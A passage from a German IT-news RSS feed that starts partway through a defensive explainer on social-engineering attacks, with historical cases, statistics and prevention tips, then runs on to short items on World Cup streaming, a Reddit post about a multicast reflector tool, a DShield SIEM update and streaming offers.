<li><p><strong>Phishing-Angriffe</strong> (zu denen auch SMS-basierte <a title="Smishing" href="https://www.computerwoche.de/article/2796003/wie-phishing-per-sms-funktioniert.html" target="_blank">Smishing</a>– und Voice-basierte <a title="Vishing-Attacken" href="https://www.computerwoche.de/article/2796419/wie-phishing-per-telefon-funktioniert.html" target="_blank">Vishing-Attacken</a> zählen) sind oft mit geringem Aufwand verbunden. Das Motto: “Die Masse macht’s”. Im Rahmen von Phishing-Kampagnen werden oft Tausende identischer E-Mails verschickt. Anschließend müssen die Angreifer nur noch darauf warten, dass jemand leichtgläubig genug ist, um auf den enthaltenen Anhang zu klicken.</p></li>



<li><p><strong>Spear Phishing</strong> oder auch Whaling bezeichnet Phishing-Angriffe, die ganz bewusst <a title="hochrangige Ziele ins Visier nehmen" href="https://www.csoonline.com/article/3491895/e-mail-sicherheit-die-psychotricks-der-spear-phishing-betruger.html" target="_blank">hochrangige Ziele ins Visier nehmen</a>. Spear-Phishing-Angreifer verbringen im Regelfall viel Zeit damit, solche Ziele zunächst auszukundschaften. Das Ziel besteht dabei darin, einen möglichst überzeugenden, personalisierten Scam auf die Beine zu stellen.</p></li>



<li><p><strong>Baiting</strong> ist ein essenzieller Bestandteil aller Phishing-Formen – und anderen Betrügereien. Es bezeichnet die Verlockung, mit der die Ziele in Versuchung geführt werden – sei es eine SMS, die kostenlose Geschenkkarten verspricht oder eine E-Mail, die Kryptowährungen zu besonders attraktiven Preisen oder gar kostenlos in Aussicht stellt.</p></li>



<li><p>Beim <strong>Pretexting</strong> handelt es sich um eine <a title='betrügerische Form von "Storytelling"' href="https://www.computerwoche.de/article/2803547/was-ist-pretexting.html" target="_blank">betrügerische Form von “Storytelling”</a>. Die dabei erfundene Geschichte soll das Opfer zum Beispiel dazu bewegen, persönliche Informationen oder Zugangsdaten preiszugeben. Weiß ein Angreifer beispielsweise, bei welcher Bank sein Opfer Kunde ist, könnte er sich als Mitarbeiter des Kundendiensts ausgeben und unter einem Vorwand wie “Zahlungsverzug” versuchen, Finanzinformationen zu erhalten.</p></li>



<li><p><strong>Business Email Compromise</strong> (BEC), auch bekannt als <a title="CEO-Fraud" href="https://www.computerwoche.de/article/2765169/wenn-hacker-chef-spielen.html" target="_blank">CEO-Fraud</a>, kombiniert mehrere der bislang genannten Techniken. Ein Angreifer erlangt entweder die Kontrolle über die E-Mail-Adresse eines Opfers oder schafft es, E-Mails zu versenden, die so aussehen, als kämen sie von dieser legitimen Adresse. Damit kontaktieren die Angreifer die Untergebenen des Angegriffenen in seinem Namen und ordnen beispielsweise dringliche Überweisungen an.</p></li>



<li><p><strong>Tailgating</strong> ist eine physische Social-Engineering-Form, bei der Angreifer den Mitarbeitern eines Unternehmens <a title="ins Firmengebäude folgen" href="https://www.csoonline.com/article/3493920/10-essenzielle-masnahmen-fur-physische-sicherheit.html" target="_blank">ins Firmengebäude folgen</a>. Dazu könnten diese sich beispielsweise als Lieferant oder neuer Mitarbeiter, der den Ausweis vergessen hat, ausgeben.</p></li>
</ul>



<h2 class="wp-block-heading">Social Engineering – Beispiele</h2>



<p class="wp-block-paragraph">Um ein Gefühl dafür zu bekommen, auf welche Social-Engineering-Taktiken Sie besonders achten sollten, empfiehlt sich ein Blick auf erfolgreiche Angriffe der Vergangenheit. Hierbei konzentrieren wir uns auf drei spezifische Social-Engineering-Angriffe, die für Cyberkriminelle besonders einträglich ausgefallen sind:</p>



<p class="wp-block-paragraph"><strong>1. Etwas Verlockendes anbieten</strong></p>



<p class="wp-block-paragraph">Jeder Trickbetrüger weiß: Am einfachsten ist es, aus der menschlichen Gier Profit zu schlagen. Das bildet die Grundlage des klassischen <a href="https://www.computerwoche.de/article/2600682/insider-chat-mit-einem-online-betrueger.html" title="nigerianischen 419-Scams" target="_blank">nigerianischen 419-Scams</a>: Hierbei gaukeln Betrüger ihren Opfern vor, sie müssten hohe, unrechtmäßig erworbene Geldsummen aus dem eigenen Land zu einer sicheren Bank im Ausland transferieren. Dazu bräuchten sie Unterstützung: Gegen die Zahlung vermeintlicher Provisions-, Verwaltungs- oder Versicherungsgebühren könnten die Opfer einen Gutteil des oft millionenschweren Geldbetrags abbekommen, so dass betrügerische Versprechen. </p>



<p class="wp-block-paragraph">Angriffe dieser Art sind seit Jahrzehnten bekannt und eigentlich eine Lachnummer, aber nichtsdestotrotz immer noch eine effektive Social-Engineering-Technik, auf die Menschen hereinfallen: Im Jahr 2007 überwies der Schatzmeister eines dünn besiedelten Bezirks im US-Bundesstaat Michigan einem solchen Betrüger <a href="https://www.cfo.com/risk-compliance/2007/06/treasurer-steals-to-pay-for-e-mail-scam/" title="1,2 Millionen Dollar an öffentlichen Geldern" target="_blank" rel="noopener">1,2 Millionen Dollar an öffentlichen Geldern</a> – in der Hoffnung abkassieren zu können. </p>



<p class="wp-block-paragraph">Ein weiterer gängiger Köder ist die Aussicht auf einen neuen, besseren Job: Im Rahmen einer äußerst peinlichen Kompromittierung traf es im Jahr 2011 das Sicherheitsunternehmen RSA auf diese Weise. Mindestens zwei Mitarbeiter öffneten eine Malware-verseuchte Datei, die <a href="https://www.networkworld.com/article/697270/malware-cybercrime-was-this-the-email-that-took-down-rsa.html" title="an eine Phishing-E-Mail angehängt war" target="_blank">an eine Phishing-E-Mail angehängt war</a>. Der Dateiname: “2011 recruitment plan.xls”.</p>



<p class="wp-block-paragraph"><strong>2. Fake it till you make it</strong></p>



<p class="wp-block-paragraph">Eine der simpelsten – und überraschenderweise auch erfolgreichsten – Social-Engineering-Techniken besteht darin, sich als ratlosen Mitarbeiter auszugeben. Bei einem seiner legendären frühen Betrugsversuche verschaffte sich Kevin Mitnick Zugang zu den Betriebssystem-Entwicklungsservern der <a href="http://passwordresearch.com/stories/story47.html" title="Digital Equipment Corporation" target="_blank" rel="noopener">Digital Equipment Corporation</a>. Sein Vorgehen: Er rief bei DEC an, gab sich als leitender Entwickler aus und behauptete, er habe Probleme mit dem Login. Er wurde postwendend mit neuen Logindaten versorgt. Das spielte sich schon 1979 ab – man sollte also meinen, die Dinge hätten sich seitdem verbessert. Das ist allerdings nicht der Fall: Im Jahr 2016 erlangte ein Hacker <a href="https://www.nytimes.com/2016/02/09/us/hackers-access-employee-records-at-justice-and-homeland-security-depts.html" title="die Kontrolle über ein E-Mail-Konto" target="_blank" rel="noopener">die Kontrolle über ein E-Mail-Konto</a> des US-Justizministeriums und nutzte es, um sich wie seinerzeit Mitnick Zugangsdaten zu verschaffen. </p>



<p class="wp-block-paragraph">Zwar haben viele Organisationen Barrieren aufgebaut, die diese Art des dreisten Betrugs verhindern sollen, aber oft ist es nicht besonders schwer, sie zu umgehen. Als Hewlett-Packard (HP) im Jahr 2005 <a href="https://www.welt.de/print-welt/article155234/HP-Chef-gesteht-Verwicklung.html" title="Privatdetektive damit beauftragte " target="_blank" rel="noopener">Privatdetektive damit beauftragte </a>herauszufinden, welche Vorstandsmitglieder Informationen an die Presse durchstachen, versorgte das Unternehmen die Schnüffler mit den letzten vier Ziffern der Sozialversicherungsnummer ihrer Zielpersonen. Diese Daten akzeptierte der technische Support von HPs TK-Provider AT&amp;T als Identitätsnachweis und händigte den Detektiven detaillierte Anrufprotokolle aus.</p>



<p class="wp-block-paragraph"><strong>3. Autorität spielen</strong></p>



<p class="wp-block-paragraph">Viele Menschen sind daran gewöhnt, Autoritäten zu respektieren. Das wissen auch Cyberkriminelle. Sie spielen sich als Vorgesetzte oder Führungskräfte aus, um an ihr Ziel zu gelangen. So überwiesen im Jahr 2015 Finanzmitarbeiter von Ubiquiti Networks Firmengelder in Millionenhöhe <a href="https://krebsonsecurity.com/2015/08/tech-firm-ubiquiti-suffers-46m-cyberheist/" title="an Social-Engineering-Betrüger" target="_blank" rel="noopener">an Social-Engineering-Betrüger</a>, die sich als Führungskräfte des Unternehmens ausgegeben und ihre Glaubwürdigkeit mit gefälschten E-Mail-Absendern unterstrichen hatten. </p>



<p class="wp-block-paragraph">Ein anderes Beispiel: Zur Jahrtausendwende gehörte es für (manche) britische Boulevard-Journalisten zum guten Ton, sich Zugang zu den Voicemail-Konten von für sie interessanten Personen zu verschaffen. So überzeugte ein Journalist den TK-Anbieter Vodafone davon, die Voicemail-PIN <a href="https://www.theguardian.com/uk/2011/apr/05/sienna-miller-wins-court-order-for-phone-data" title="der Schauspielerin Sienna Miller zurückzusetzen" target="_blank" rel="noopener">der Schauspielerin Sienna Miller zurückzusetzen</a>, indem er dort anrief und sich als “Kollege John aus der Credit-Control-Abteilung” ausgab. </p>



<p class="wp-block-paragraph">Ein weiteres prominentes Beispiel ist John Podesta, Hillary Clintons ehemaliger Wahlkampfleiter, der 2016 von russischen Spionen gehackt wurde. Die Cyberkriminellen hatten ihm im Vorfeld eine Phishing-E-Mail zugestellt, die als Nachricht von Google getarnt war und <a href="https://www.cbsnews.com/news/the-phishing-email-that-hacked-the-account-of-john-podesta/" title="eine Aufforderung enthielt, sein Passwort zurückzusetzen" target="_blank" rel="noopener">eine Aufforderung enthielt, sein Passwort zurückzusetzen</a>. Statt sein Konto zu schützen, gab er damit seine Anmeldedaten preis.</p>



<h2 class="wp-block-heading">Social Engineering – Zahlen &amp; Statistiken</h2>



<ul class="wp-block-list">
<li><p>Allein im Jahr 2024 konnten kriminelle Hacker durch BEC-Angriffe rund <strong>6,3 Milliarden Dollar</strong> einstreichen. (Quelle: <a href="https://www.verizon.com/business/resources/reports/2025-dbir-data-breach-investigations-report.pdf" target="_blank" rel="noreferrer noopener">Verizon DBIR 2025</a>)</p></li>



<li><p>Smishing macht <strong>39 Prozent</strong> aller mobilen Bedrohungen aus. (Quelle: <a title="SlashNext" href="https://slashnext.com/state-of-phishing-2023/" target="_blank" rel="noopener">SlashNext</a>)</p></li>



<li><p>Mit der Einführung von ChatGPT stieg die Zahl der Social-Engineering-Angriffe <strong>um 45 Prozent</strong>. (Quelle: <a title="SlashNext" href="https://slashnext.com/state-of-phishing-2023/" target="_blank" rel="noopener">SlashNext</a>)</p></li>



<li><p>Mit 17 Prozent aller Kompromittierungen ist Phishing der <strong>zweithäufigste, initiale Malware-Infektionsvektor</strong>. (Quelle: Mandiant <a title="M-Trends-Report 2024" href="https://cloud.google.com/security/resources/m-trends" target="_blank" rel="noopener">M-Trends-Report 2024</a>)</p></li>
</ul>



<h2 class="wp-block-heading">Social-Engineering-Angriffe abwehren</h2>



<p class="wp-block-paragraph">Wir haben fünf Tipps zur Abwehr von Social-Engineering-Attacken für Sie zusammengestellt:</p>



<p class="wp-block-paragraph"><strong>1. Security Awareness</strong></p>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2785239/security-awareness-richtig-planen-und-vermitteln.html" title="Security-Awareness-Schulungen" target="_blank">Security-Awareness-Schulungen</a> sind der beste Weg, um Social Engineering zu verhindern. Nur wenn die Mitarbeiter wissen, welche Gefahr ihnen droht, können sie sich gegen solche Angriffe wappnen. Erarbeiten Sie ein umfassendes Schulungsprogramm, dass zu mehr Sicherheitsbewusstsein führt! Es sollte regelmäßig aktualisiert werden, um sowohl allgemeinen Phishing-Bedrohungen als auch neuen, <a href="https://www.computerwoche.de/article/2798234/neue-wege-zum-phishing-erfolg.html" title="gezielten Bedrohungen" target="_blank">gezielten Bedrohungen</a> angemessen begegnen zu können. </p>



<p class="wp-block-paragraph">Dabei sollten Sie von einer tiefgehenden Erklärung technischer Schwachstellen und Details absehen und stattdessen Beispiele nennen, die die Methoden der Angreifer in den Fokus stellen. Auch interaktive Elemente wie ein Quiz können dazu beitragen, Mitarbeiter vorzubereiten.</p>



<p class="wp-block-paragraph"><strong>2. Security-Briefing für Mitarbeiter in Schlüsselpositionen</strong></p>



<p class="wp-block-paragraph">Unternehmen sollten Führungskräfte und leitende Angestellte in ihre Bemühungen einbeziehen, da sie für Cyberkriminelle die <a href="https://www.computerwoche.de/a/so-werden-ceos-hereingelegt,3256518" title="attraktivsten Social-Engineering-Ziele" target="_blank">attraktivsten Social-Engineering-Ziele</a> darstellen. Wichtig ist es auch Mitarbeiter, die die Berechtigung zu Finanztransaktionen haben, regelmäßig über <a href="https://www.cio.de/a/wenn-hacker-chef-spielen,3331676" title="die Gefahren aufzuklären" target="_blank">die Gefahren aufzuklären</a>.</p>



<p class="wp-block-paragraph"><strong>3. Bestehende Prozesse prüfen</strong></p>



<p class="wp-block-paragraph">Für finanzielle und andere wichtige Transaktionen bietet es sich an, zusätzliche Kontrollmaßnahmen einzuziehen. Dabei gilt es im Auge zu behalten, dass einige Schutzmaßnahmen, beispielsweise eine Aufgabentrennung, sinnlos werden könnten, wenn es sich um eine <a href="https://www.computerwoche.de/article/2772542/mitarbeiter-die-zu-innentaetern-wurden.html" title="Insider-Bedrohung" target="_blank">Insider-Bedrohung</a> handelt. Eine regelmäßige Risikoanalyse ist zu empfehlen.</p>



<p class="wp-block-paragraph"><strong>4. Neue Richtlinien für dringende Anfragen</strong></p>



<p class="wp-block-paragraph">Sendet der Vorstandsvorsitzende eine E-Mail von seinem Gmail-Konto, sollte das bei den Mitarbeitern Alarmsignale auslösen. Um vorschnelle Reaktionen zu vermeiden, die ins Unglück führen können, sollten Mitarbeiter ein klar definiertes Notfallverfahren an die Hand bekommen und im Zweifel direkt mit dem Absender kommunizieren können.</p>



<p class="wp-block-paragraph"><strong>5. Incident Management</strong></p>



<p class="wp-block-paragraph">Überprüfen, verfeinern und testen Sie regelmäßig Ihre Incident-Management-Systeme. Dazu bieten sich Übungen mit der Geschäftsleitung und den wichtigsten Mitarbeitern an, in denen Kontrollmechanismen und potenzielle Schwachstellen auf den Prüfstand kommen.</p>



<h2 class="wp-block-heading">Social Engineering – Toolkits</h2>



<p class="wp-block-paragraph">Es gibt am Markt einige Tools und Services, die Unternehmen bei Awareness-Kampagnen und Phishing-Simulationen unterstützen:</p>



<ul class="wp-block-list">
<li><p>Das <a title="Social Engineering Toolkit" href="https://github.com/trustedsec/social-engineer-toolkit" target="_blank" rel="noopener">Social Engineering Toolkit</a> von TrustedSec steht als kostenloser Download zur Verfügung und hilft bei der Automatisierung von Penetrationstests. Zu den Features gehören neben Social Engineering auch Spear Phishing, Fake Websites und USB-basierte Angriffe.</p></li>



<li><p>Das <a title="Social Engineering Framework" href="https://www.social-engineer.org/framework/general-discussion/" target="_blank" rel="noopener">Social Engineering Framework</a> ist eine weitere gute Ressource. Laut Aussage der Macher enthält es “aktuelle wissenschaftliche, technische und psychologische Informationen” zum Thema. Das Ziel sei es, “eine Informationssammlung für Sicherheitsexperten, Penetrationstester und Enthusiasten zu schaffen”. Das Framework wird regelmäßig aktualisiert.</p></li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.csoonline.com/article/571993/social-engineering-definition-examples-and-techniques.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Frankreich vs. Spanien: So schaut ihr alle Highlights und Tore kostenlos]]></title>
<description><![CDATA[Am Dienstagabend stehen sich Frankreich und Spanien im Halbfinale der Fußball-WM 2026 gegenüber. Wir zeigen allen Nachzüglern, wie ihr die Highlights gratis nachvollziehen könnt.
																					Dieser Artikel wurde einsortiert unter 
																	ARD,																	ZDF,															...]]></description>
<link>https://tsecurity.de/de/3669516/it-nachrichten/frankreich-vs-spanien-so-schaut-ihr-alle-highlights-und-tore-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669516/it-nachrichten/frankreich-vs-spanien-so-schaut-ihr-alle-highlights-und-tore-kostenlos/</guid>
<pubDate>Wed, 15 Jul 2026 05:47:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Am Dienstagabend stehen sich Frankreich und Spanien im Halbfinale der Fußball-WM 2026 gegenüber. Wir zeigen allen Nachzüglern, wie ihr die Highlights gratis nachvollziehen könnt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/ard.html">ARD</a>,																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[netflector - the only mDNS / SSDP / DIAL / WSD / WoL reflector you will ever need]]></title>
<description><![CDATA[This is a tool that makes all kinds of multicast-based discovery (and casting) work across networks (or VLANs). Full disclosure: I am using Claude Code. There are a lot of AI-sensitive people out there, so I want to be fully transparent this time. This post was not touched by AI, 100% human writt...]]></description>
<link>https://tsecurity.de/de/3669398/linux-tipps/netflector-the-only-mdns-ssdp-dial-wsd-wol-reflector-you-will-ever-need/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669398/linux-tipps/netflector-the-only-mdns-ssdp-dial-wsd-wol-reflector-you-will-ever-need/</guid>
<pubDate>Wed, 15 Jul 2026 04:08:41 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>This is a tool that makes all kinds of multicast-based discovery (and casting) work across networks (or VLANs).</p> <p>Full disclosure: <strong>I am using Claude Code</strong>. There are a lot of AI-sensitive people out there, so I want to be fully transparent this time. This post was not touched by AI, 100% human written :) Having said that, I am an experienced C++ developer (in HFT) and am writing low-level code (including networking) on a daily basis. This is not a vibe-coded project. I have designed this system and I have either written to reviewed all code.</p> <p>With that out of the way, the main motivation behind this project for me was twofold: learn Rust and solve a real problem I have at home. My phone and my TV are in different VLANs, so vanilla multicast discovery does not work. While there are plenty of mDNS reflectors out there, my LG TV uses SSDP and DIAL. In order to cast YouTube from my phone to my TV following needs to happen:</p> <ul> <li>Phone sends M-SEARCH SSDP multicast request which needs to be reflected into TVs VLAN (other reflectors can do that).</li> <li>TV responds with the unicast 200 OK, which needs to be forwarded back to the phone. (can be allowed in firewall, less secure than using this tool).</li> <li>Phone initiates a device discovery TCP connection to TV (can be allowed in firewall, less secure than using this tool).</li> <li>TV replies with the details of its REST endpoint (works fine because established connections are usually allowed anyway).</li> <li>Phone initiates another TCP connection to TV's REST endpoint. The connection must be from the TV's subnet (could be allowed and NAT'ed in firewall).</li> </ul> <p>So, to do this I would need to poke holes in the firewall and configure NAT. Additionally to that, I would still need to run some sort of reflector for SSDP multicast. How do I know? This is what I was doing for a couple of years :)</p> <p>Not anymore. My tool does all that automagically:</p> <ul> <li>It reflects multicast discovery packets (mDNS / SSDP / WSD).</li> <li>It proxies unicast UDP responses (SSDP / WSD).</li> <li>It does NAT for TCP connections (DIAL).</li> <li>It supports MAC filtering (so only specific devices are discoverable).</li> <li>It tolerates network interface re-creation. As long as new interface has the same name - reflection will continue.</li> <li>And as a bonus, it also reflects Wake-on-Lan packets.</li> </ul> <p>It does that with a very low footprint: static Linux binaries are &lt;1MB. Right now it runs on my MikroTik router (as a container) and uses less than 3MB of RAM.</p> <p>Currently I build static binaries for Linux (amd64/arm64/armv7/armv5) and FreeBSD (amd64/arm64), dynamic binaries for macOS (arm64) and a multi-arch Docker image. I will add more platforms on request.</p> <p>I really hope that this project will be useful not only for me :)</p> <p>GitHub: <a href="https://github.com/netflector/netflector">https://github.com/netflector/netflector</a></p> <p>Feedback is welcome.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/s3rgb"> /u/s3rgb </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uwom6f/netflector_the_only_mdns_ssdp_dial_wsd_wol/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uwom6f/netflector_the_only_mdns_ssdp_dial_wsd_wol/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Recent DShield SIEM Update, (Tue, Jul 14th)]]></title>
<description><![CDATA[The last update to the DShield SIEM [4] was in Sep 2025 which contained some minor tweaks. This update currently is using ELK stack version 8.19.15, contains some additional dashboards and new logs.]]></description>
<link>https://tsecurity.de/de/3669372/it-security-nachrichten/recent-dshield-siem-update-tue-jul-14th/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669372/it-security-nachrichten/recent-dshield-siem-update-tue-jul-14th/</guid>
<pubDate>Wed, 15 Jul 2026 03:53:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The last update to the DShield SIEM [<a href="https://isc.sans.edu/diary/DShield+SIEM+Docker+Updates/32276">4</a>] was in Sep 2025 which contained some minor tweaks. This update currently is using ELK stack version 8.19.15, contains some additional dashboards and new logs.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix bringt gratis Testphase zurück: So schaut ihr &quot;Unsere Kleine Farm&quot; ohne zu zahlen]]></title>
<description><![CDATA[Der Streaming-Dienst bietet wieder kostenlose Testphasen an. Doch nicht jeder hat das gleiche Glück beim gratis Serienspaß. Wir verraten euch, wie ihr möglichst lange kostenlos streamen könnt. 
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,					...]]></description>
<link>https://tsecurity.de/de/3669016/it-nachrichten/netflix-bringt-gratis-testphase-zurueck-so-schaut-ihr-quotunsere-kleine-farmquot-ohne-zu-zahlen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669016/it-nachrichten/netflix-bringt-gratis-testphase-zurueck-so-schaut-ihr-quotunsere-kleine-farmquot-ohne-zu-zahlen/</guid>
<pubDate>Tue, 14 Jul 2026 21:47:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Streaming-Dienst bietet wieder kostenlose Testphasen an. Doch nicht jeder hat das gleiche Glück beim gratis Serienspaß. Wir verraten euch, wie ihr möglichst lange kostenlos streamen könnt. 
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/tv-sender/">TV-Sender</a>,																	<a href="https://www.netzwelt.de/mediathek/index.html">Mediatheken</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/netflix.html">Netflix</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Frankreich vs. Spanien: Hier seht ihr das Halbfinale der Fußball-WM 2026 im Free-TV]]></title>
<description><![CDATA[Am Dienstag, dem 14. Juli, kommt es bei der Fußball-WM 2026 zum Halbfinale zwischen Frankreich und Spanien. So empfangt ihr die Partie kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	ZDF,																	Bundesliga-Live-Stream: Fußbal...]]></description>
<link>https://tsecurity.de/de/3669015/it-nachrichten/frankreich-vs-spanien-hier-seht-ihr-das-halbfinale-der-fussball-wm-2026-im-free-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669015/it-nachrichten/frankreich-vs-spanien-hier-seht-ihr-das-halbfinale-der-fussball-wm-2026-im-free-tv/</guid>
<pubDate>Tue, 14 Jul 2026 21:47:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Am Dienstag, dem 14. Juli, kommt es bei der Fußball-WM 2026 zum Halbfinale zwischen Frankreich und Spanien. So empfangt ihr die Partie kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/waipu-index.html">Waipu.tv</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[1.800 TV-Sender kostenlos freischalten: Mit einer versteckten VLC-Funktion geht das]]></title>
<description><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></description>
<link>https://tsecurity.de/de/3668908/it-nachrichten/1800-tv-sender-kostenlos-freischalten-mit-einer-versteckten-vlc-funktion-geht-das/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668908/it-nachrichten/1800-tv-sender-kostenlos-freischalten-mit-einer-versteckten-vlc-funktion-geht-das/</guid>
<pubDate>Tue, 14 Jul 2026 20:31:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp plant eigenen Backup-Speicher als iCloud-Alternative]]></title>
<description><![CDATA[WhatsApp arbeitet an einem eigenen Cloud-Speicher für Chat-Backups auf dem iPhone. Wie WABetaInfo berichtet, sollen Nutzer so ihre Sicherungen künftig wahlweise auf den Servern des Messengers statt in iCloud ablegen können. 2 GB kostenlos, 50 GB im Abo Die neue Backup-Funktion steckt bereits in V...]]></description>
<link>https://tsecurity.de/de/3668887/ios-mac-os/whatsapp-plant-eigenen-backup-speicher-als-icloud-alternative/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668887/ios-mac-os/whatsapp-plant-eigenen-backup-speicher-als-icloud-alternative/</guid>
<pubDate>Tue, 14 Jul 2026 20:25:22 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WhatsApp arbeitet an einem eigenen Cloud-Speicher für Chat-Backups auf dem iPhone. Wie WABetaInfo berichtet, sollen Nutzer so ihre Sicherungen künftig wahlweise auf den Servern des Messengers statt in iCloud ablegen können. 2 GB kostenlos, 50 GB im Abo Die neue Backup-Funktion steckt bereits in Version 26.28.10.16 der WhatsApp-Beta, die über TestFlight verteilt wird. Die Funktion […]]]></content:encoded>
</item>
<item>
<title><![CDATA[WM 2026: Frankreich gegen Spanien heute kostenlos live im TV und Stream?]]></title>
<description><![CDATA[Weltmeisterschaft 2026, und das erste Halbfinale elektrisiert die Fans: Gibt es Frankreich gegen Spanien heute gratis live im TV und Stream?]]></description>
<link>https://tsecurity.de/de/3668825/it-nachrichten/wm-2026-frankreich-gegen-spanien-heute-kostenlos-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668825/it-nachrichten/wm-2026-frankreich-gegen-spanien-heute-kostenlos-live-im-tv-und-stream/</guid>
<pubDate>Tue, 14 Jul 2026 19:46:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Weltmeisterschaft 2026, und das erste Halbfinale elektrisiert die Fans: Gibt es Frankreich gegen Spanien heute gratis live im TV und Stream?]]></content:encoded>
</item>
<item>
<title><![CDATA[Frankreich gegen Spanien: Auf diesem Sender seht ihr das Halbfinale der Fußball-WM 2026 kostenlos im TV und Live-Stream]]></title>
<description><![CDATA[Am Dienstag, dem 14. Juli, kommt es bei der Fußball-WM 2026 zum Halbfinale zwischen Frankreich und Spanien. So empfangt ihr die Partie kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	ZDF,																	Bundesliga-Live-Stream: Fußbal...]]></description>
<link>https://tsecurity.de/de/3668716/it-nachrichten/frankreich-gegen-spanien-auf-diesem-sender-seht-ihr-das-halbfinale-der-fussball-wm-2026-kostenlos-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668716/it-nachrichten/frankreich-gegen-spanien-auf-diesem-sender-seht-ihr-das-halbfinale-der-fussball-wm-2026-kostenlos-im-tv-und-live-stream/</guid>
<pubDate>Tue, 14 Jul 2026 18:58:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Am Dienstag, dem 14. Juli, kommt es bei der Fußball-WM 2026 zum Halbfinale zwischen Frankreich und Spanien. So empfangt ihr die Partie kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/waipu-index.html">Waipu.tv</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nur noch heute Abend: Aktion „3 Monate Audible gratis“ läuft aus]]></title>
<description><![CDATA[Die Anfang Juni gestartete Sonderaktion für den neuen Audible-Standard-Zugang läuft nur noch kurze Zeit. Amazon zufolge endet das zeitlich begrenzte Angebot am morgigen Mittwoch, dem 15. Juli 2026. Welche Konditionen euch angeboten werden, hängt dabei vom verwendeten Amazon-Konto ab. Berechtigte ...]]></description>
<link>https://tsecurity.de/de/3668513/ios-mac-os/nur-noch-heute-abend-aktion-3-monate-audible-gratis-laeuft-aus/</link>
